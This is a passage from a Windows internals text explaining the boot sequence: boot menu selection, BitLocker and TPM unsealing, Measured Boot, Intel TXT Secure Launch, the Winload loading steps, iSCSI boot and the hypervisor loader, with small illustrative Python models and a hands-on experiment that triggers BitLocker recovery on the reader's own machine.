hybrid boot. This is because the hibernation file is invalidated after a resume to avoid multiple resumes
from the same point. The Windows Resume Application BCD object is linked to the Boot Manager
descriptor through a specific BCD element (called resumeobject, which is described in the “Hibernation
and Fast Startup” section later in this chapter).
Bootmgr detects whether OEM custom boot actions are registered through the relative BCD ele-
ment, and, if so, processes them. At the time of this writing, the only custom boot action supported is
the launch of an OEM boot sequence. In this way the OEM vendors can register a customized recovery
sequence invoked through a particular key pressed by the user at startup.
The boot menu
In Windows 8 and later, in the standard boot configurations, the classical (legacy) boot menu is
never shown because a new technology, modern boot, has been introduced. Modern boot provides
Windows with a rich graphical boot experience while maintaining the ability to dive more deeply into
boot-related settings. In this configuration, the final user is able to select the OS that they want to ex-
ecute, even with touch-enabled systems that don’t have a proper keyboard and mouse. The new boot
menu is drawn on top of the Win32 subsystem; we describe its architecture later in this chapter in the
”Smss, Csrss, and Wininit” section.
The bootmenupolicy boot option controls whether the Boot Loader should use the old or new
technology to show the boot menu. If there are no OEM boot sequences, Bootmgr enumerates the
system boot entry GUIDs that are linked into the displayorder boot option of the Boot Manager. (If this
value is empty, Bootmgr relies on the default entry.) For each GUID found, Bootmgr opens the relative
BCD object and queries the type of boot application, its startup device, and the readable description.
All three attributes must exist; otherwise, the Boot entry is considered invalid and will be skipped. If
Bootmgr doesn’t find a valid boot application, it shows an error message to the user and the entire
Boot process is aborted. The boot menu display algorithm begins here. One of the key functions,
BmpProcessBootEntry, is used to decide whether to show the Legacy Boot menu:
■ If the boot menu policy of the default boot application (and not of the Bootmgr entry) is explicitly set to the Modern type, the algorithm exits immediately and launches the default entry through the BmpLaunchBootEntry function. Noteworthy is that in this case no user keys are checked, so it is not possible to force the boot process to stop. If the system has multiple boot entries, a special BCD option5 is added to the in-memory boot option list of the default boot application. In this way, in the later stages of the System Startup, Winlogon can recognize the option and show the Modern menu.
■ Otherwise, if the boot policy for the default boot application is legacy (or is not set at all) and there is only one entry, BmpProcessBootEntry checks whether the user has pressed the F8 or F10 key. These are described in the bootmgr.xsl resource file as the Advanced Options and Boot Options keys. If Bootmgr detects that one of the keys is pressed at startup time, it adds the relative BCD element to the in-memory boot options list of the default boot application (the BCD element is not written to the disk). The two boot options are processed later in the Windows Loader. Finally, BmpProcessBootEntry checks whether the system is forced to display the boot menu even in case of only one entry (through the relative "displaybootmenu" BCD option).
5 The multi-boot "special option" has no name. Its element code is BCDE_LIBRARY_TYPE_MULTI_BOOT_SYSTEM (which corresponds to the hexadecimal value 0x16000071).
■ In case of multiple boot entries, the timeout value (stored as a BCD option) is checked and, if it is set to 0, the default application is immediately launched; otherwise, the Legacy Boot menu is shown with the BmDisplayBootMenu function.
While displaying the Legacy Boot menu, Bootmgr enumerates the installed boot tools that are listed
in the toolsdisplayorder boot option of the Boot Manager.
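The three cases above can be condensed into a small decision function. This is only an illustrative Python sketch: the entry dictionaries, option names, and return values are hypothetical stand-ins for the internal structures that BmpProcessBootEntry actually works with.

```python
# Toy model of the boot-menu decision described above. Entries are plain
# dicts; "Standard" bootmenupolicy stands for the Modern menu, "Legacy"
# (or absent) for the old one. Names and return values are illustrative.

def process_boot_entry(entries, default_entry, timeout,
                       f8_or_f10_pressed, display_boot_menu_forced=False):
    """Return (action, in-memory options added to the default entry)."""
    in_memory_options = []

    # Case 1: the default application explicitly requests the Modern menu.
    # No user keys are checked; with multiple entries, a special option is
    # added in memory so that Winlogon can show the Modern menu later.
    if default_entry.get("bootmenupolicy") == "Standard":
        if len(entries) > 1:
            in_memory_options.append("multi_boot_system")
        return "launch-default", in_memory_options

    # Case 2: legacy (or unset) policy with a single entry. F8/F10 add an
    # in-memory element processed later by the Windows Loader; the menu is
    # shown only if explicitly forced (the "displaybootmenu" option).
    if len(entries) == 1:
        if f8_or_f10_pressed:
            in_memory_options.append("advanced_options")
        if display_boot_menu_forced:
            return "show-legacy-menu", in_memory_options
        return "launch-default", in_memory_options

    # Case 3: multiple entries; a zero timeout launches immediately.
    if timeout == 0:
        return "launch-default", in_memory_options
    return "show-legacy-menu", in_memory_options
```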
Launching a boot application
The last goal of the Windows Boot Manager is to correctly launch a boot application, even if it resides
on a BitLocker-encrypted drive, and manage the recovery sequence in case something goes wrong.
BmpLaunchBootEntry receives a GUID and the boot options list of the application that needs to be ex-
ecuted. One of the first things that the function does is check whether the specified entry is a Windows
Recovery (WinRE) entry (through a BCD element). These kinds of boot applications are used when deal-
ing with the recovery sequence. If the entry is a WinRE type, the system needs to determine the boot
application that WinRE is trying to recover. In this case, the startup device of the boot application that
needs to be recovered is identified and then later unlocked (in case it is encrypted).
The BmTransferExecution routine uses the services provided by the boot library to open the device
of the boot application, identify whether the device is encrypted, and, if so, decrypt it and read the
target OS loader file. If the target device is encrypted, the Windows Boot Manager tries first to get
the master key from the TPM. In this case, the TPM unseals the master key only if certain conditions
are satisfied (see the next paragraph for more details). In this way, if some startup configuration has
changed (like the enablement of Secure Boot, for example), the TPM won’t be able to release the key.
If the key extraction from the TPM has failed, the Windows Boot Manager displays a screen similar to
the one shown in Figure 12-6, asking the user to enter an unlock key (even if the boot menu policy is
set to Modern, because at this stage the system has no way to launch the Modern Boot user interface).
At the time of this writing, Bootmgr supports four different unlock methods: PIN, passphrase, external
media, and recovery key. If the user is unable to provide a key, the startup process is interrupted and
the Windows recovery sequence starts.
The firmware is used to read and verify the target OS loader. The verification is done through the
Code Integrity library, which applies the secure boot policies (both the systems and all the customized
ones) on the file’s digital signature. Before actually passing the execution to the target boot application,
the Windows Boot Manager needs to notify the registered components (ETW and Measured Boot in
particular) that the boot application is starting. Furthermore, it needs to make sure that the TPM can’t
be used to unseal anything else.
FIGURE 12-6 The BitLocker recovery procedure, which has been raised because something in the boot configuration has changed.
Finally, the code execution is transferred to the Windows Loader through BlImgStartBootApplication. This routine returns only in case of certain errors. As before, the Boot Manager manages the latter situation by launching the Windows Recovery Sequence.
Measured Boot
In late 2006, Intel introduced the Trusted Execution Technology (TXT), which ensures that an authentic operating system is started in a trusted environment and not modified or altered by an external agent (like malware). The TXT uses a TPM and cryptographic techniques to provide measurements of software and platform (UEFI) components. Windows 8.1 and later support a new feature called Measured Boot, which measures each component, from firmware up through the boot start drivers, stores those measurements in the TPM of the machine, and then makes available a log that can be tested remotely to verify the boot state of the client. This technology would not exist without the TPM. The term measurement refers to a process of calculating a cryptographic hash of a particular entity, like code, data structures, configuration, or anything that can be loaded in memory. The measurements are used for various purposes. Measured Boot provides antimalware software with a trusted (resistant to spoofing and tampering) log of all boot components that started before Windows. The antimalware software uses the log to determine whether components that ran before it are trustworthy or are infected with malware. The software on the local machine sends the log to a remote server for evaluation. Working with the TPM and non-Microsoft software, Measured Boot allows a trusted server on the network to verify the integrity of the Windows startup process.
The main roles of the TPM are the following:
■ Provide secure nonvolatile storage for protecting secrets
■ Provide platform configuration registers (PCRs) for storing measurements
■ Provide hardware cryptographic engines and a true random number generator
The TPM stores the Measured Boot measurements in PCRs. Each PCR provides a storage area that allows an unlimited number of measurements in a fixed amount of space. This feature is provided by a property of cryptographic hashes. The Windows Boot Manager (or the Windows Loader in later stages) never writes directly into a PCR register; it extends the PCR content. The extend operation takes the current value of the PCR, appends the new measured value, and calculates a cryptographic hash (usually SHA-1 or SHA-256) of the combined value. The hash result is the new PCR value. The extend method assures the order-dependency of the measurements. One of the properties of cryptographic hashes is that they are order-dependent. This means that hashing two values A and B produces two different results from hashing B and A. Because PCRs are extended (not written), even if malicious software is able to extend a PCR, the only effect is that the PCR would carry an invalid measurement. Another property of cryptographic hashes is that it's impossible to create a block of data that produces a given hash. Thus, it's impossible to extend a PCR to get a given result, except by measuring the same objects in exactly the same order.
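The extend operation is simple enough to model in a few lines of Python. This is a toy model, not TPM code: it only illustrates how hashing the old PCR value together with the new measurement makes the final value depend on both the content and the order of the measurements.

```python
import hashlib

# Toy model of the TPM extend operation described above: the new PCR
# value is the hash of the old PCR value concatenated with the new
# measured value.

def extend(pcr: bytes, measurement: bytes) -> bytes:
    """Return SHA-256(old PCR value || measured value)."""
    return hashlib.sha256(pcr + measurement).digest()

pcr = bytes(32)                  # PCRs start out zeroed
pcr = extend(pcr, b"bootmgr")    # measure the Boot Manager first...
pcr = extend(pcr, b"winload")    # ...then the OS loader
```

Swapping the order of the two extend calls produces a different final value, which is exactly the order-dependency property described above.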
At the early stages of the boot process, the System Integrity module of the boot library registers different callback functions. Each callback will be called later at different points in the startup sequence with the goal of managing measured-boot events, like Test Signing enabling, Boot Debugger enabling, PE Image loading, boot application starting, hashing, launching, exiting, and BitLocker unlocking. Each callback decides which kind of data to hash and to extend into the TPM PCR registers. For instance, every time the Boot Manager or the Windows Loader starts an external executable image, it generates three measured boot events that correspond to different phases of the image loading: LoadStarting, ApplicationHashed, and ApplicationLaunched. In this case, the measured entities, which are sent to the PCR registers (11 and 12) of the TPM, are the following: hash of the image, hash of the digital signature of the image, image base, and size.
All the measurements will be employed later in Windows when the system is completely started, for a procedure called attestation. Because of the uniqueness property of cryptographic hashes, you can use PCR values and their logs to identify exactly what version of software is executing, as well as its environment. At this stage, Windows uses the TPM to provide a TPM quote, where the TPM signs the PCR values to assure that values are not maliciously or inadvertently modified in transit. This guarantees the authenticity of the measurements. The quoted measurements are sent to an attestation authority, which is a trusted third-party entity that is able to authenticate the PCR values and translate those values by comparing them with a database of known good values. Describing all the models used for attestation is outside the scope of this book. The final goal is that the remote server confirms whether the client is a trusted entity or could be altered by some malicious component.
Earlier we explained how the Boot Manager is able to automatically unlock the BitLocker-encrypted startup volume. In this case, the system takes advantage of another important service provided by the TPM: secure nonvolatile storage. The TPM nonvolatile random access memory (NVRAM) is persistent across power cycles and has more security features than system memory. While allocating TPM NVRAM, the system should specify the following:
■ Read access rights Specify which TPM privilege level, called locality, can read the data. More importantly, specify whether any PCRs must contain specific values in order to read the data.
■ Write access rights The same as above but for write access.
■ Attributes/permissions Provide optional authorization values for reading or writing (like a password) and temporal or persistent locks (that is, the memory can be locked for write access).
The first time the user encrypts the boot volume, BitLocker encrypts its volume master key (VMK) with another random symmetric key and then seals that key using the extended TPM PCR values (in particular, PCR 7 and 11, which measure the BIOS and the Windows Boot sequence) as the sealing condition. Sealing is the act of having the TPM encrypt a block of data so that it can be decrypted only by the same TPM that has encrypted it, and only if the specified PCRs have the correct values. In subsequent boots, if the unsealing is requested by a compromised boot sequence or by a different BIOS configuration, the TPM refuses the request to unseal and reveal the VMK encryption key.
EXPERIMENT: Invalidate TPM measurements
In this experiment, you explore a quick way to invalidate the TPM measurements by invalidating the BIOS configuration. Before measuring the startup sequence, drivers, and data, Measured Boot starts with a static measurement of the BIOS configuration (stored in PCR1). The measured BIOS configuration data strictly depends on the hardware manufacturer and sometimes even includes the UEFI boot order list. Before starting the experiment, verify that your system includes a valid TPM. Type tpm.msc in the Start menu search box and execute the snap-in. The Trusted Platform Module (TPM) Management console should appear. Verify that a TPM is present and enabled in your system by checking that the Status box is set to The TPM Is Ready For Use.
Start the BitLocker encryption of the system volume. If your system volume is already encrypted, you can skip this step. You must be sure to save the recovery key, though. (You can check the recovery key by selecting Back Up Your Recovery Key, which is located in the BitLocker Drive Encryption applet of the Control Panel.) Open File Explorer by clicking its taskbar icon, and navigate to This PC. Right-click the system volume (the volume that contains all the Windows files, usually C:) and select Turn On BitLocker. After the initial verifications are made, select Let BitLocker Automatically Unlock My Drive when prompted on the Choose How to Unlock Your Drive at Startup page. In this way, the VMK will be sealed by the TPM using the boot measurements as the unsealing key. Be careful to save or print the recovery key; you'll need it in the next stage. Otherwise, you won't be able to access your files anymore. Leave the default value for all the other options.
After the encryption is complete, switch off your computer and start it by entering the UEFI BIOS configuration. (This procedure is different for each PC manufacturer; check the hardware user manual for directions for entering the UEFI BIOS settings.) In the BIOS configuration pages, simply change the boot order and then restart your computer. (You can change the startup boot order by using the UefiTool utility, which is in the downloadable files of the book.) If your hardware manufacturer includes the boot order in the TPM measurements, you should get the BitLocker recovery message before Windows boots. Otherwise, to invalidate the TPM measurements, simply insert the Windows Setup DVD or flash drive before switching on the workstation. If the boot order is correctly configured, the Windows Setup bootstrap code starts, which prints
the Press Any Key For Boot From CD Or DVD message. If you don’t press any key, the system pro-
ceeds to boot the next Boot entry. In this case, the startup sequence has changed, and the TPM
measurements are different. As a result, the TPM won’t be able to unseal the VMK.
You can invalidate the TPM measurements (and produce the same effects) if you have Secure
Boot enabled and you try to disable it. This experiment demonstrates that Measured Boot is tied
to the BIOS configuration.
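The failure to unseal can be illustrated with the TPM extend-and-seal semantics. The following Python sketch is illustrative only: the event names are invented, and a real TPM seals secrets against PCR policies through its own command interface rather than a simple comparison.

```python
import hashlib

def extend(pcr, measurement):
    # TPM-style extend: the new PCR value chains the old value with the event digest
    return hashlib.sha256(pcr + hashlib.sha256(measurement).digest()).digest()

def replay(events):
    pcr = bytes(32)  # PCRs start zeroed at platform reset
    for event in events:
        pcr = extend(pcr, event)
    return pcr

def unseal(key, sealed_to_pcr, events):
    # The key is released only if the boot produced the same measurement chain
    return key if replay(events) == sealed_to_pcr else None

# Hypothetical measurement log: BIOS configuration (including boot order), then Boot Manager
boot_order_a = [b"UEFI boot order: HDD,USB", b"bootmgfw.efi"]
sealed_pcr = replay(boot_order_a)

vmk = b"volume-master-key"
assert unseal(vmk, sealed_pcr, boot_order_a) == vmk   # unchanged boot: VMK released
assert unseal(vmk, sealed_pcr,
              [b"UEFI boot order: USB,HDD", b"bootmgfw.efi"]) is None  # changed order: recovery needed
```

Because the digest chain is order-sensitive, swapping the boot entries changes the final PCR value, which is exactly why the recovery message appears.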
Trusted execution
Although Measured Boot provides a way for a remote entity to confirm the integrity of the boot
process, it does not resolve an important issue: the Boot Manager still trusts the machine's firmware code
and uses its services to effectively communicate with the TPM and start the entire platform. At the
time of this writing, attacks against the UEFI core firmware have been demonstrated multiple times.
The Trusted Execution Technology (TXT) has been improved to support another important feature,
called Secure Launch. Secure Launch (also known as Trusted Boot in the Intel nomenclature) provides
secure authenticated code modules (ACM), which are signed by the CPU manufacturer and executed
by the chipset (and not by the firmware). Secure Launch provides the support of dynamic measure-
ments made to PCRs that can be reset without resetting the platform. In this scenario, the OS provides
a special Trusted Boot (TBOOT) module used to initialize the platform for secure mode operation and
initiate the Secure Launch process.
An authenticated code module (ACM) is a piece of code provided by the chipset manufacturer. The ACM is signed by the manufacturer, and its code runs in one of the highest privilege levels within a special secure memory that is internal to the processor. ACMs are invoked using a special GETSEC instruction. There are two types of ACMs: BIOS and SINIT. While the BIOS ACM measures the BIOS and performs some BIOS security functions, the SINIT ACM is used to perform the measurement and launch of the Operating System TCB (TBOOT) module. Both BIOS and SINIT ACM are usually contained inside the
System BIOS image (this is not a strict requirement), but they can be updated and replaced by the OS if
needed (refer to the “Secure Launch” section later in this chapter for more details).
The ACM is the core root of trusted measurements. As such, it operates at the highest security level
and must be protected against all types of attacks. The processor microcode copies the ACM module in
the secure memory and performs different checks before allowing the execution. The processor verifies
that the ACM has been designed to work with the target chipset. Furthermore, it verifies the ACM in-
tegrity, version, and digital signature, which is matched against the public key hardcoded in the chipset
fuses. The GETSEC instruction doesn’t execute the ACM if one of the previous checks fails.
Another key feature of Secure Launch is the support of Dynamic Root of Trust Measurement (DRTM)
by the TPM. As introduced in the previous section, Measured Boot, 16 different TPM PCR registers (0
through 15) provide storage for boot measurements. The Boot Manager could extend these PCRs, but
it’s not possible to clear their contents until the next platform reset (or power up). This explains why
these kinds of measurements are called static measurements. Dynamic measurements are measure-
ments made to PCRs that can be reset without resetting the platform. There are six dynamic PCRs
(actually there are eight, but two are reserved and not usable by the OS) used by Secure Launch and
the trusted operating system.
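The static/dynamic distinction can be sketched in a few lines of illustrative Python. The PCR indices follow the common TXT convention of PCRs 17-22 being DRTM-resettable; treat the exact indices as an assumption of this sketch, not a statement of the Windows implementation.

```python
import hashlib

class Tpm:
    STATIC = range(0, 16)    # PCRs 0-15: cleared only by a platform reset or power up
    DYNAMIC = range(17, 23)  # PCRs 17-22: resettable by the DRTM without a platform reset

    def __init__(self):
        self.pcrs = {i: bytes(32) for i in [*self.STATIC, *self.DYNAMIC]}

    def extend(self, index, measurement):
        # Extending is the only way to change a PCR outside of a reset
        self.pcrs[index] = hashlib.sha256(self.pcrs[index] + measurement).digest()

    def drtm_reset(self, index):
        if index not in self.DYNAMIC:
            raise PermissionError("static PCRs cannot be cleared without a platform reset")
        self.pcrs[index] = bytes(32)

tpm = Tpm()
tpm.extend(0, b"BIOS configuration")  # static measurement: sticks until reboot
tpm.extend(17, b"SINIT ACM")          # dynamic measurement
tpm.drtm_reset(17)                    # allowed: PCR 17 is dynamic
```

Attempting the same `drtm_reset` on PCR 0 raises, mirroring the fact that static measurements survive until the next platform reset.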
In a typical TXT boot sequence, the boot processor, after having validated the ACM integrity, ex-
ecutes the ACM startup code, which measures critical BIOS components, exits ACM secure mode, and
jumps to the UEFI BIOS startup code. The BIOS then measures all of its remaining code, configures the
platform, and verifies the measurements, executing the GETSEC instruction. This TXT instruction loads
the BIOS ACM module, which performs the security checks and locks the BIOS configuration. At this
stage the UEFI BIOS could measure each option ROM code (for each device) and the Initial Program
Load (IPL). The platform has been brought to a state where it’s ready to boot the operating system
(specifically through the IPL code).
The TXT boot sequence is part of the Static Root of Trust Measurement (SRTM) because the trusted
BIOS code (and the Boot Manager) has been already verified, and it’s in a good known state that will
never change until the next platform reset. Typically, for a TXT-enabled OS, a special TCB (TBOOT)
module is used instead of the first kernel module being loaded. The purpose of the TBOOT module is to
initialize the platform for secure mode operation and initiate the Secure Launch. The Windows TBOOT
module is named TcbLaunch.exe. Before starting the Secure Launch, the TBOOT module must be verified by the SINIT ACM module. So, there should be some components that execute the GETSEC instruction and start the DRTM. In the Windows Secure Launch model, this component is the boot library.
Before the system can enter the secure mode, it must put the platform in a known state. (In this
state, all the processors, except the bootstrap one, are in a special idle state, so no other code could
ever be executed.) The boot library executes the GETSEC instruction, specifying the SENTER operation.
This causes the processor to do the following:
1. Validate the SINIT ACM module and load it into the processor's secure memory.
2. Start the DRTM by clearing all the relative dynamic PCRs and then measuring the SINIT ACM.
3. Execute the SINIT ACM code, which measures the trusted OS code and executes the Launch Control Policy. The policy determines whether the current measurements (which reside in some dynamic PCR registers) allow the OS to be considered trusted.
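Step 3 can be sketched as a policy check over the measured TBOOT image. This Python fragment is hypothetical: the allow-list contents are invented, and a real Launch Control Policy evaluates PCR contents and signed policy elements, not a raw file hash.

```python
import hashlib

# Hypothetical allow-list of trusted-OS measurements, standing in for the LCP
trusted_measurements = {hashlib.sha256(b"TcbLaunch.exe v1").hexdigest()}

def sinit_launch(tboot_image):
    digest = hashlib.sha256(tboot_image).hexdigest()  # measure the trusted OS code
    if digest not in trusted_measurements:
        return "TXT reset"  # the machine is considered under attack
    return "jump to trusted OS entry point"

assert sinit_launch(b"TcbLaunch.exe v1") == "jump to trusted OS entry point"
assert sinit_launch(b"tampered image") == "TXT reset"
```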
When one of these checks fails, the machine is considered to be under attack, and the ACM issues
a TXT reset, which prevents any kind of software from being executed until the platform has been
hard reset. Otherwise, the ACM enables the Secure Launch by exiting the ACM mode and jumping
to the trusted OS entry point (which, in Windows, is the TcbMain function of the TcbLaunch.exe module). The trusted OS then takes control. It can extend and reset the dynamic PCRs for every measure-
ment that it needs (or by using another mechanism that assures the chain of trust).
Describing the entire Secure Launch architecture is outside the scope of this book. Please refer to
the Intel manuals for the TXT specifications. Refer to the Secure Launch section, later in this chapter,
for a description of how Trusted Execution is implemented in Windows. Figure 12-7 shows all the com-
ponents involved in the Intel TXT technology.
FIGURE 12-7 Intel TXT (Trusted Execution Technology) components.
The Windows OS Loader
The Windows OS Loader (Winload) is the boot application launched by the Boot Manager with the goal
of loading and correctly executing the Windows kernel. This process includes multiple primary tasks:
- Create the execution environment of the kernel. This involves initializing, and using, the kernel's page tables and developing a memory map. The EFI OS Loader also sets up and initializes the kernel's stacks, shared user page, GDT, IDT, TSS, and segment selectors.
- Load into memory all modules that need to be executed or accessed before the disk stack is initialized. These include the kernel and the HAL because they handle the early initialization of basic services once control is handed off from the OS Loader. Boot-critical drivers and the registry system hive are also loaded into memory.
- Determine whether Hyper-V and the Secure Kernel (VSM) should be executed, and, if so, correctly load and start them.
- Draw the first background animation using the new high-resolution boot graphics library (BGFX, which replaces the old Bootvid.dll driver).
- Orchestrate the Secure Launch boot sequence in systems that support Intel TXT. (For a complete description of Measured Boot, Secure Launch, and Intel TXT, see the respective sections earlier in this chapter.) This task was originally implemented in the hypervisor loader, but it has been moved starting from Windows 10 October Update (RS5).
The Windows loader has been improved and modified multiple times during each Windows release.
OslMain is the main loader function (called by the Boot Manager) that (re)initializes the boot library
and calls the internal OslpMain. The boot library, at the time of this writing, supports two different
execution contexts:
- Firmware context means that paging is disabled. Actually, it's not disabled but it's provided by the firmware, which performs the one-to-one mapping of physical addresses, and only firmware services are used for memory management. Windows uses this execution context in the Boot Manager.
- Application context means that paging is enabled and provided by the OS. This is the context used by the Windows Loader.
The Boot Manager, just before transferring the execution to the OS loader, creates and initializes the four-level x64 page table hierarchy that will be used by the Windows kernel, creating only the self-map and the identity mapping entries. OslMain switches to the Application execution context, just before starting. The OslPrepareTarget routine captures the boot/shutdown status of the last boot, reading from the bootstat.dat file located in the system root directory.
When the last boot has failed more than twice, it returns to the Boot Manager for starting the Recovery environment. Otherwise, it reads in the SYSTEM registry hive, \Windows\System32\Config\System, so that it can determine which device drivers need to be loaded to accomplish the boot. (A hive is a file that contains a registry subtree. More details about the registry were provided in Chapter 10.)
Then it initializes the BGFX display library (drawing the first background image) and shows the
Advanced Options menu if needed (refer to the section The boot menu earlier in this chapter). One
of the most important data structures needed for the NT kernel boot, the Loader Block, is allocated
and filled with basic information, like the system hive base address and size, a random entropy value
(queried from the TPM if possible), and so on.
OslInitializeLoaderBlock contains code that queries the system's ACPI BIOS to retrieve basic device and configuration information (including event time and date information stored in the system's CMOS). This information is gathered into internal data structures that will be stored under the HKLM\HARDWARE\DESCRIPTION registry key later in the boot. This is mostly a legacy key that exists only for compatibility reasons. Today, it's the Plug and Play manager database that stores the true information on hardware.
Next, Winload begins loading the files from the boot volume needed to start the kernel initialization. The boot volume is the volume that corresponds to the partition on which the system directory (usually \Windows) of the installation being booted is located. Winload follows these steps:
1. Determines whether the hypervisor or the Secure Kernel needs to be loaded (through the hypervisorlaunchtype BCD option and the VSM policy); if so, it starts phase 0 of the hypervisor setup. Phase 0 pre-loads the HV loader module (Hvloader.dll) into RAM memory and executes its HvlLoadHypervisor initialization routine. The latter loads and maps the hypervisor image (Hvix64.exe, Hvax64.exe, or Hvaa64.exe, depending on the architecture) and all its dependencies in memory.
2. Enumerates all the firmware-enumerable disks and attaches the list in the Loader Parameter Block. Furthermore, loads the Synthetic Initial Machine Configuration hive (Imc.hiv) if specified by the configuration data and attaches it to the loader block.
3. Initializes the kernel Code Integrity module (CI.dll) and builds the CI Loader block. The Code Integrity module will be then shared between the NT kernel and Secure Kernel.
4. Processes any pending firmware updates. (Windows 10 supports firmware updates distributed through Windows Update.)
5. Loads the appropriate kernel and HAL images (Ntoskrnl.exe and Hal.dll by default). If Winload fails to load either of these files, it prints an error message. Before properly loading the two modules' dependencies, Winload validates their contents against their digital certificates and loads the API Set Schema system file. In this way, it can process the API Set imports.
6. Initializes the debugger, loading the correct debugger transport.
7. Loads the CPU microcode update module (Mcupdate.dll), if applicable.
8. OslpLoadAllModules finally loads the modules on which the NT kernel and HAL depend, ELAM drivers, core extensions, TPM drivers, and all the remaining boot drivers (respecting the load order: the file system drivers are loaded first). Boot device drivers are drivers necessary to boot the system. The configuration of these drivers is stored in the SYSTEM registry hive. Every device driver has a registry subkey under HKLM\SYSTEM\CurrentControlSet\Services. For example, Services has a subkey named rdyboost for the ReadyBoost driver, which you can see in Figure 12-8 (for a detailed description of the Services registry entries, see the section Services in Chapter 10). All the boot drivers have a start value of SERVICE_BOOT_START (0).
9. At this stage, to properly allocate physical memory, Winload is still using services provided by the EFI Firmware (the AllocatePages boot service routine). The virtual address translation is instead managed by the boot library, running in the Application execution context.
FIGURE 12-8 ReadyBoost driver service settings.
10. Reads in the NLS (National Language System) files used for internationalization. By default, these are l_intl.nls, C_1252.nls, and C_437.nls.
11. If the evaluated policies require the startup of the VSM, executes phase 0 of the Secure Kernel setup, which resolves the locations of the VSM Loader support routines (exported by the Hvloader.dll module), and loads the Secure Kernel module (Securekernel.exe) and all of its dependencies.
12. For the S edition of Windows, determines the minimum user-mode configurable code integrity signing level for the Windows applications.
13. Calls the OslArchpKernelSetupPhase0 routine, which performs the memory steps required for kernel transition, like allocating a GDT, IDT, and TSS; mapping the HAL virtual address space; and allocating the kernel stacks, shared user page, and USB legacy handoff. Winload uses the UEFI GetMemoryMap facility to obtain a complete system physical memory map and maps each physical page that belongs to EFI Runtime Code/Data into virtual memory space. The complete physical map will be passed to the OS kernel.
14. Executes phase 1 of VSM setup, copying all the needed ACPI tables from VTL0 to VTL1 memory. (This step also builds the VTL1 page tables.)
15. The virtual memory translation module is completely functional, so Winload calls the ExitBootServices UEFI function to get rid of the firmware boot services and remaps all the remaining Runtime UEFI services into the created virtual address space, using the SetVirtualAddressMap UEFI runtime function.
16. If needed, launches the hypervisor and the Secure Kernel (exactly in this order). If successful, the execution control returns to Winload in the context of the Hyper-V Root Partition. (Refer to Chapter 9, Virtualization technologies, for details about Hyper-V.)
17. Transfers the execution to the kernel through the OslArchTransferToKernel routine.
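The boot-driver selection of step 8 can be sketched over a made-up Services snapshot. This is illustrative Python: the real loader walks the SYSTEM hive and honors the full service group load order, whereas this sketch only promotes file system drivers to the front.

```python
SERVICE_BOOT_START = 0  # the Start value that marks a boot driver

# Simplified, invented snapshot of HKLM\SYSTEM\CurrentControlSet\Services
services = {
    "Ntfs":     {"Start": 0, "Group": "File System"},
    "rdyboost": {"Start": 0, "Group": "System Bus Extender"},
    "disk":     {"Start": 0, "Group": "SCSI Class"},
    "Spooler":  {"Start": 2, "Group": "SpoolerGroup"},  # auto-start: not loaded by Winload
}

def boot_drivers(services):
    # Keep only boot-start drivers, placing file system drivers first
    boot = [name for name, svc in services.items() if svc["Start"] == SERVICE_BOOT_START]
    return sorted(boot, key=lambda name: services[name]["Group"] != "File System")

assert boot_drivers(services)[0] == "Ntfs"      # file system driver loads first
assert "Spooler" not in boot_drivers(services)  # non-boot services are skipped
```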
Booting from iSCSI
Internet SCSI (iSCSI) devices are a kind of network-attached storage in that remote physical disks are
connected to an iSCSI Host Bus Adapter (HBA) or through Ethernet. These devices, however, are differ-
ent from traditional network-attached storage (NAS) because they provide block-level access to disks,
unlike the logical-based access over a network file system that NAS employs. Therefore, an iSCSI-
connected disk appears as any other disk drive, both to the boot loader and to the OS, as long as the
Microsoft iSCSI Initiator is used to provide access over an Ethernet connection. By using iSCSI-enabled
disks instead of local storage, companies can save on space, power consumption, and cooling.
Although Windows has traditionally supported booting only from locally connected disks or
network booting through PXE, modern versions of Windows are also capable of natively booting
from iSCSI devices through a mechanism called iSCSI Boot. As shown in Figure 12-9, the boot loader
(Winload.efi) detects whether the system supports iSCSI boot devices by reading the iSCSI Boot Firmware
Table (iBFT) that must be present in physical memory (typically exposed through ACPI). Thanks to the
iBFT table, Winload knows the location, path, and authentication information for the remote disk. If the
table is present, Winload opens and loads the network interface driver provided by the manufacturer,
which is marked with the CM_SERVICE_NETWORK_BOOT_LOAD (0x1) boot flag.
Additionally, Windows Setup also has the capability of reading this table to determine bootable iSCSI devices and allow direct installation on such a device, such that no imaging is required. In combination with the Microsoft iSCSI Initiator, this is all that's required for Windows to boot from iSCSI.
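Winload can trust the iBFT only if it is a well-formed ACPI table, and ACPI tables obey a simple integrity rule: all bytes, the checksum field included, must sum to zero modulo 256. The following Python sketch uses an invented minimal 10-byte header for brevity; the real iBFT carries the full 36-byte ACPI system description table header.

```python
import struct

def acpi_checksum_ok(table):
    # ACPI rule: every byte of the table, checksum included, sums to 0 mod 256
    return sum(table) % 256 == 0

def make_table(signature, payload):
    # Minimal ACPI-style header: signature (4), length (4), revision (1), checksum (1)
    length = 10 + len(payload)
    raw = signature + struct.pack("<IBB", length, 1, 0) + payload
    checksum = (-sum(raw)) % 256          # value that makes the total wrap to zero
    return raw[:9] + bytes([checksum]) + raw[10:]

table = make_table(b"iBFT", b"initiator and target parameters")
assert table[:4] == b"iBFT" and acpi_checksum_ok(table)
```

Flipping any byte of the table breaks the checksum, which is how a loader can cheaply reject a corrupted firmware table.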
FIGURE 12-9 iSCSI boot architecture.
The hypervisor loader
The hypervisor loader is the boot module (its file name is Hvloader.dll) used to properly load and start the Hyper-V hypervisor and the Secure Kernel. For a complete description of Hyper-V and the Secure Kernel, refer to Chapter 9. The hypervisor loader module is deeply integrated in the Windows Loader and has two main goals:
- Detect the hardware platform; load and start the proper version of the Windows Hypervisor (Hvix64.exe for Intel systems, Hvax64.exe for AMD systems, and Hvaa64.exe for ARM64 systems).
- Parse the Virtual Secure Mode (VSM) policy; load and start the Secure Kernel.
In Windows 8, this module was an external executable loaded by Winload on demand. At that time the only duty of the hypervisor loader was to load and start Hyper-V. With the introduction of the VSM and Trusted Boot, the architecture has been redesigned for a better integration of each component.
